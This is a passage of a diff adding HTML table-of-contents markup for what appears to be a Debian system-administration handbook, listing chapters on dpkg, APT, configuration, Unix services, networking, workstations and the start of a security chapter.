+                          href="sect.source-package-structure.html#id-1.8.7.5">5.3.2. Usage within Debian</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.manipulating-packages-with-dpkg.html">5.4. Manipulating Packages with <code
+                        class="command">dpkg</code></a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.5">5.4.1. Installing Packages</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.6">5.4.2. Package Removal</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.7">5.4.3. Querying <code
+                            class="command">dpkg</code>'s Database and Inspecting <code
+                            class="filename">.deb</code> Files</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.manipulating-packages-with-dpkg.html#id-1.8.8.8">5.4.4. <code
+                            class="command">dpkg</code>'s Log File</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.manipulating-packages-with-dpkg.html#sect.multi-arch">5.4.5. Multi-Arch Support</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.coexistence-with-other-packaging-systems.html">5.5. Coexistence with Other Packaging Systems</a></span></dt></dl></dd><dt><span
+                class="chapter"><a
+                  href="apt.html">6. Maintenance and Updates: The APT Tools</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="apt.html#sect.apt-sources.list">6.1. Filling in the <code
+                        class="filename">sources.list</code> File</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.6">6.1.1. Syntax</a></span></dt><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.7">6.1.2. Repositories for <span
+                            class="distribution distribution">Stable</span> Users</a></span></dt><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.8">6.1.3. Repositories for <span
+                            class="distribution distribution">Testing</span>/<span
+                            class="distribution distribution">Unstable</span> Users</a></span></dt><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.9">6.1.4. Using Alternate Mirrors</a></span></dt><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.10">6.1.5. Non-Official Resources: <code
+                            class="literal">mentors.debian.net</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="apt.html#id-1.9.10.11">6.1.6. Caching Proxy for Debian Packages</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html">6.2. <code
+                        class="command">aptitude</code>, <code
+                        class="command">apt-get</code>, and <code
+                        class="command">apt</code> Commands</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#id-1.9.11.8">6.2.1. Initialization</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#id-1.9.11.9">6.2.2. Installing and Removing</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#sect.apt-upgrade">6.2.3. System Upgrade</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#sect.apt-config">6.2.4. Configuration Options</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#sect.apt.priorities">6.2.5. Managing Package Priorities</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#sect.apt-mix-distros">6.2.6. Working with Several Distributions</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-get.html#sect.automatic-tracking">6.2.7. Tracking Automatically Installed Packages</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.apt-cache.html">6.3. The <code
+                        class="command">apt-cache</code> Command</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-frontends.html">6.4. Frontends: <code
+                        class="command">aptitude</code>, <code
+                        class="command">synaptic</code></a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.apt-frontends.html#sect.aptitude">6.4.1. <code
+                            class="command">aptitude</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.apt-frontends.html#id-1.9.13.7">6.4.2. <code
+                            class="command">synaptic</code></a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.package-authentication.html">6.5. Checking Package Authenticity</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dist-upgrade.html">6.6. Upgrading from One Stable Distribution to the Next</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.dist-upgrade.html#id-1.9.15.3">6.6.1. Recommended Procedure</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dist-upgrade.html#id-1.9.15.4">6.6.2. Handling Problems after an Upgrade</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.regular-upgrades.html">6.7. Keeping a System Up to Date</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html">6.8. Automatic Upgrades</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.automatic-upgrades.html#id-1.9.17.5">6.8.1. Configuring <code
+                            class="command">dpkg</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automatic-upgrades.html#id-1.9.17.6">6.8.2. Configuring APT</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automatic-upgrades.html#id-1.9.17.7">6.8.3. Configuring <code
+                            class="command">debconf</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automatic-upgrades.html#id-1.9.17.8">6.8.4. Handling Command Line Interactions</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automatic-upgrades.html#id-1.9.17.9">6.8.5. The Miracle Combination</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.searching-packages.html">6.9. Searching for Packages</a></span></dt></dl></dd><dt><span
+                class="chapter"><a
+                  href="solving-problems.html">7. Solving Problems and Finding Relevant Information</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="solving-problems.html#sect.documentation-sources">7.1. Documentation Sources</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="solving-problems.html#sect.manual-pages">7.1.1. Manual Pages</a></span></dt><dt><span
+                        class="section"><a
+                          href="solving-problems.html#id-1.10.4.5">7.1.2. <span
+                            class="emphasis"><em>info</em></span> Documents</a></span></dt><dt><span
+                        class="section"><a
+                          href="solving-problems.html#id-1.10.4.6">7.1.3. Specific Documentation</a></span></dt><dt><span
+                        class="section"><a
+                          href="solving-problems.html#id-1.10.4.7">7.1.4. Websites</a></span></dt><dt><span
+                        class="section"><a
+                          href="solving-problems.html#id-1.10.4.8">7.1.5. Tutorials (<span
+                            class="emphasis"><em>HOWTO</em></span>)</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.common-procedures.html">7.2. Common Procedures</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.common-procedures.html#id-1.10.5.5">7.2.1. Configuring a Program</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.common-procedures.html#id-1.10.5.6">7.2.2. Monitoring What Daemons Are Doing</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.common-procedures.html#id-1.10.5.7">7.2.3. Asking for Help on a Mailing List</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.common-procedures.html#id-1.10.5.8">7.2.4. Reporting a Bug When a Problem Is Too Difficult</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="basic-configuration.html">8. Basic Configuration: Network, Accounts, Printing...</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="basic-configuration.html#sect.config-language-support">8.1. Configuring the System for Another Language</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="basic-configuration.html#sect.default-language">8.1.1. Setting the Default Language</a></span></dt><dt><span
+                        class="section"><a
+                          href="basic-configuration.html#sect.keyboard-config">8.1.2. Configuring the Keyboard</a></span></dt><dt><span
+                        class="section"><a
+                          href="basic-configuration.html#sect.utf8-migration">8.1.3. Migrating to UTF-8</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.network-config.html">8.2. Configuring the Network</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.network-config.html#sect.interface-ethernet">8.2.1. Ethernet Interface</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-config.html#sect.interface-wireless">8.2.2. Wireless Interface</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-config.html#sect.ppp-rtc">8.2.3. Connecting with PPP through a PSTN Modem</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-config.html#sect.adsl">8.2.4. Connecting through an ADSL Modem</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-config.html#sect.roaming-network-config">8.2.5. Automatic Network Configuration for Roaming Users</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.hostname-name-service.html">8.3. Setting the Hostname and Configuring the Name Service</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.hostname-name-service.html#sect.name-resolution">8.3.1. Name Resolution</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html">8.4. User and Group Databases</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.user-group-databases.html#sect.etc-passwd">8.4.1. User List: <code
+                            class="filename">/etc/passwd</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-group-databases.html#sect.etc-shadow">8.4.2. The Hidden and Encrypted Password File: <code
+                            class="filename">/etc/shadow</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-group-databases.html#sect.account-modification">8.4.3. Modifying an Existing Account or Password</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-group-databases.html#sect.disabling-account">8.4.4. Disabling an Account</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.user-group-databases.html#sect.etc-group">8.4.5. Group List: <code
+                            class="filename">/etc/group</code></a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.creating-accounts.html">8.5. Creating Accounts</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.shell-environment.html">8.6. Shell Environment</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-printing.html">8.7. Printer Configuration</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-bootloader.html">8.8. Configuring the Bootloader</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.config-bootloader.html#sect.identify-disks">8.8.1. Identifying the Disks</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-bootloader.html#sect.config-lilo">8.8.2. Configuring LILO</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-bootloader.html#sect.config-grub">8.8.3. GRUB 2 Configuration</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-bootloader.html#sect.config-yaboot">8.8.4. For Macintosh Computers (PowerPC): Configuring Yaboot</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html">8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.timezone">8.9.1. Timezone</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.time-synchronization">8.9.2. Time Synchronization</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.rotation-logs">8.9.3. Rotating Log Files</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.sharing-admin-rights">8.9.4. Sharing Administrator Rights</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.fstab-mount-points">8.9.5. List of Mount Points</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.config-misc.html#sect.locate-updatedb">8.9.6. <code
+                            class="command">locate</code> and <code
+                            class="command">updatedb</code></a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html">8.10. Compiling a Kernel</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.kernel-compilation-prerequisites">8.10.1. Introduction and Prerequisites</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.kernel-sources">8.10.2. Getting the Sources</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.config-kernel">8.10.3. Configuring the Kernel</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.kernel-build">8.10.4. Compiling and Building the Package</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.modules-build">8.10.5. Compiling External Modules</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-compilation.html#sect.kernel-patch">8.10.6. Applying a Kernel Patch</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.kernel-installation.html">8.11. Installing a Kernel</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.kernel-installation.html#sect.kernel-package">8.11.1. Features of a Debian Kernel Package</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.kernel-installation.html#sect.kernel-installation-with-dpkg">8.11.2. Installing with <code
+                            class="command">dpkg</code></a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="unix-services.html">9. Unix Services</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="unix-services.html#sect.system-boot">9.1. System Boot</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="unix-services.html#sect.systemd">9.1.1. The systemd init system</a></span></dt><dt><span
+                        class="section"><a
+                          href="unix-services.html#sect.sysvinit">9.1.2. The System V init system</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.remote-login.html">9.2. Remote Login</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.remote-login.html#sect.ssh">9.2.1. Secure Remote Login: SSH</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.remote-login.html#sect.remote-desktops">9.2.2. Using Remote Graphical Desktops</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.rights-management.html">9.3. Managing Rights</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.administration-interfaces.html">9.4. Administration Interfaces</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.administration-interfaces.html#sect.webmin">9.4.1. Administrating on a Web Interface: <code
+                            class="command">webmin</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.administration-interfaces.html#sect.debconf">9.4.2. Configuring Packages: <code
+                            class="command">debconf</code></a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.syslog.html">9.5. <code
+                        class="command">syslog</code> System Events</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.syslog.html#sect.syslog-principe">9.5.1. Principle and Mechanism</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.syslog.html#sect.syslog-config">9.5.2. The Configuration File</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.inetd.html">9.6. The <code
+                        class="command">inetd</code> Super-Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.task-scheduling-cron-atd.html">9.7. Scheduling Tasks with <code
+                        class="command">cron</code> and <code
+                        class="command">atd</code></a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.task-scheduling-cron-atd.html#sect.format-crontab">9.7.1. Format of a <code
+                            class="filename">crontab</code> File</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.task-scheduling-cron-atd.html#sect.at-command">9.7.2. Using the <code
+                            class="command">at</code> Command</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.asynchronous-task-scheduling-anacron.html">9.8. Scheduling Asynchronous Tasks: <code
+                        class="command">anacron</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.quotas.html">9.9. Quotas</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.backup.html">9.10. Backup</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.backup.html#id-1.12.13.11">9.10.1. Backing Up with <code
+                            class="command">rsync</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.backup.html#id-1.12.13.12">9.10.2. Restoring Machines without Backups</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.hotplug.html">9.11. Hot Plugging: <span
+                        class="emphasis"><em>hotplug</em></span></a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.hotplug.html#id-1.12.14.2">9.11.1. Introduction</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.hotplug.html#id-1.12.14.3">9.11.2. The Naming Problem</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.hotplug.html#id-1.12.14.4">9.11.3. How <span
+                            class="emphasis"><em>udev</em></span> Works</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.hotplug.html#id-1.12.14.5">9.11.4. A concrete example</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.power-management.html">9.12. Power Management: Advanced Configuration and Power Interface (ACPI)</a></span></dt></dl></dd><dt><span
+                class="chapter"><a
+                  href="network-infrastructure.html">10. Network Infrastructure</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="network-infrastructure.html#sect.gateway">10.1. Gateway</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtual-private-network.html">10.2. Virtual Private Network</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.virtual-private-network.html#sect.openvpn">10.2.1. OpenVPN</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.virtual-private-network.html#sect.ssh-vpn">10.2.2. Virtual Private Network with SSH</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.virtual-private-network.html#sect.ipsec">10.2.3. IPsec</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.virtual-private-network.html#sect.pptp">10.2.4. PPTP</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.quality-of-service.html">10.3. Quality of Service</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.quality-of-service.html#sect.qos-principe">10.3.1. Principle and Mechanism</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.quality-of-service.html#sect.qos-config">10.3.2. Configuring and Implementing</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.dynamic-routing.html">10.4. Dynamic Routing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.ipv6.html">10.5. IPv6</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.ipv6.html#sect.ipv6-tunneling">10.5.1. Tunneling</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.domain-name-servers.html">10.6. Domain Name Servers (DNS)</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.domain-name-servers.html#sect.dns-principe">10.6.1. Principle and Mechanism</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.domain-name-servers.html#sect.dns-config">10.6.2. Configuring</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.dhcp.html">10.7. DHCP</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.dhcp.html#sect.dhcp-config">10.7.1. Configuring</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.dhcp.html#sect.dhcp-dns">10.7.2. DHCP and DNS</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.network-diagnosis-tools.html">10.8. Network Diagnosis Tools</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.network-diagnosis-tools.html#sect.netstat">10.8.1. Local Diagnosis: <code
+                            class="command">netstat</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-diagnosis-tools.html#sect.nmap">10.8.2. Remote Diagnosis: <code
+                            class="command">nmap</code></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.network-diagnosis-tools.html#sect.sniffers">10.8.3. Sniffers: <code
+                            class="command">tcpdump</code> and <code
+                            class="command">wireshark</code></a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="network-services.html">11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.smtp-mail-server">11.1. Mail Server</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="network-services.html#id-1.14.4.7">11.1.1. Installing Postfix</a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#sect.configuring-virtual-domains">11.1.2. Configuring Virtual Domains</a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#sect.restrictions-for-receiving-and-sending">11.1.3. Restrictions for Receiving and Sending</a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#sect.setting-up-greylisting">11.1.4. Setting Up <span
+                            class="foreignphrase"><em
+                              class="foreignphrase">greylisting</em></span></a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#id-1.14.4.11">11.1.5. Customizing Filters Based On the Recipient</a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#sect.postfix-antivirus">11.1.6. Integrating an Antivirus</a></span></dt><dt><span
+                        class="section"><a
+                          href="network-services.html#sect.authenticated-smtp">11.1.7. Authenticated SMTP</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.http-web-server.html">11.2. Web Server (HTTP)</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.http-web-server.html#id-1.14.5.9">11.2.1. Installing Apache</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.http-web-server.html#id-1.14.5.10">11.2.2. Configuring Virtual Hosts</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.http-web-server.html#id-1.14.5.11">11.2.3. Common Directives</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.http-web-server.html#id-1.14.5.12">11.2.4. Log Analyzers</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.ftp-file-server.html">11.3. FTP File Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.nfs-file-server.html">11.4. NFS File Server</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.nfs-file-server.html#id-1.14.7.10">11.4.1. Securing NFS</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.nfs-file-server.html#id-1.14.7.11">11.4.2. NFS Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.nfs-file-server.html#id-1.14.7.12">11.4.3. NFS Client</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.windows-file-server-with-samba.html">11.5. Setting Up Windows Shares with Samba</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.windows-file-server-with-samba.html#id-1.14.8.9">11.5.1. Samba Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.windows-file-server-with-samba.html#id-1.14.8.10">11.5.2. Samba Client</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.http-ftp-proxy.html">11.6. HTTP/FTP Proxy</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.http-ftp-proxy.html#id-1.14.9.8">11.6.1. Installing</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.http-ftp-proxy.html#id-1.14.9.9">11.6.2. Configuring a Cache</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.http-ftp-proxy.html#id-1.14.9.10">11.6.3. Configuring a Filter</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.ldap-directory.html">11.7. LDAP Directory</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.ldap-directory.html#id-1.14.10.7">11.7.1. Installing</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.ldap-directory.html#id-1.14.10.8">11.7.2. Filling in the Directory</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.ldap-directory.html#id-1.14.10.9">11.7.3. Managing Accounts with LDAP</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html">11.8. Real-Time Communication Services</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.rtc-dns-settings">11.8.1. DNS settings for RTC services</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.turn-server">11.8.2. TURN Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.sip-server">11.8.3. SIP Proxy Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.xmpp-server">11.8.4. XMPP Server</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.rtc-port-443">11.8.5. Running services on port 443</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.rtc-services.html#sect.rtc-webrtc">11.8.6. Adding WebRTC</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="advanced-administration.html">12. Advanced Administration</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="advanced-administration.html#sect.raid-and-lvm">12.1. RAID and LVM</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="advanced-administration.html#sect.raid-soft">12.1.1. Software RAID</a></span></dt><dt><span
+                        class="section"><a
+                          href="advanced-administration.html#sect.lvm">12.1.2. LVM</a></span></dt><dt><span
+                        class="section"><a
+                          href="advanced-administration.html#sect.raid-or-lvm">12.1.3. RAID or LVM?</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.virtualization.html">12.2. Virtualization</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.virtualization.html#sect.xen">12.2.1. Xen</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.virtualization.html#sect.lxc">12.2.2. LXC</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.virtualization.html#id-1.15.5.14">12.2.3. Virtualization with KVM</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.automated-installation.html">12.3. Automated Installation</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.automated-installation.html#sect.fai">12.3.1. Fully Automatic Installer (FAI)</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automated-installation.html#sect.d-i-preseeding">12.3.2. Preseeding Debian-Installer</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.automated-installation.html#sect.simple-cdd">12.3.3. Simple-CDD: The All-In-One Solution</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.monitoring.html">12.4. Monitoring</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.monitoring.html#sect.munin">12.4.1. Setting Up Munin</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.monitoring.html#sect.nagios">12.4.2. Setting Up Nagios</a></span></dt></dl></dd></dl></dd><dt><span
+                class="chapter"><a
+                  href="workstation.html">13. Workstation</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="workstation.html#sect.x11-server-configuration">13.1. Configuring the X11 Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.customizing-graphical-interface.html">13.2. Customizing the Graphical Interface</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.customizing-graphical-interface.html#id-1.16.5.2">13.2.1. Choosing a Display Manager</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.customizing-graphical-interface.html#id-1.16.5.3">13.2.2. Choosing a Window Manager</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.customizing-graphical-interface.html#id-1.16.5.4">13.2.3. Menu Management</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.graphical-desktops.html">13.3. Graphical Desktops</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.graphical-desktops.html#sect.gnome-desktop">13.3.1. GNOME</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.graphical-desktops.html#id-1.16.6.13">13.3.2. KDE and Plasma</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.graphical-desktops.html#id-1.16.6.14">13.3.3. Xfce and Others</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.main-desktop-tools.html">13.4. Email</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.main-desktop-tools.html#id-1.16.7.3">13.4.1. Evolution</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.main-desktop-tools.html#id-1.16.7.4">13.4.2. KMail</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.main-desktop-tools.html#id-1.16.7.5">13.4.3. Thunderbird and Icedove</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.web-browsers.html">13.5. Web Browsers</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.development.html">13.6. Development</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.development.html#id-1.16.9.2">13.6.1. Tools for GTK+ on GNOME</a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.development.html#id-1.16.9.3">13.6.2. Tools for Qt</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.collaborative-work.html">13.7. Collaborative Work</a></span></dt><dd><dl><dt><span
+                        class="section"><a
+                          href="sect.collaborative-work.html#id-1.16.10.3">13.7.1. Working in Groups: <span
+                            class="foreignphrase"><em
+                              class="foreignphrase">groupware</em></span></a></span></dt><dt><span
+                        class="section"><a
+                          href="sect.collaborative-work.html#id-1.16.10.4">13.7.2. Collaborative Work With FusionForge</a></span></dt></dl></dd><dt><span
+                    class="section"><a
+                      href="sect.office-suites.html">13.8. Office Suites</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.windows-emulation.html">13.9. Emulating Windows: Wine</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-clients.html">13.10. Real-Time Communications software</a></span></dt></dl></dd><dt><span
+                class="chapter"><a
+                  href="security.html">14. Security</a></span></dt><dd><dl><dt><span
+                    class="section"><a
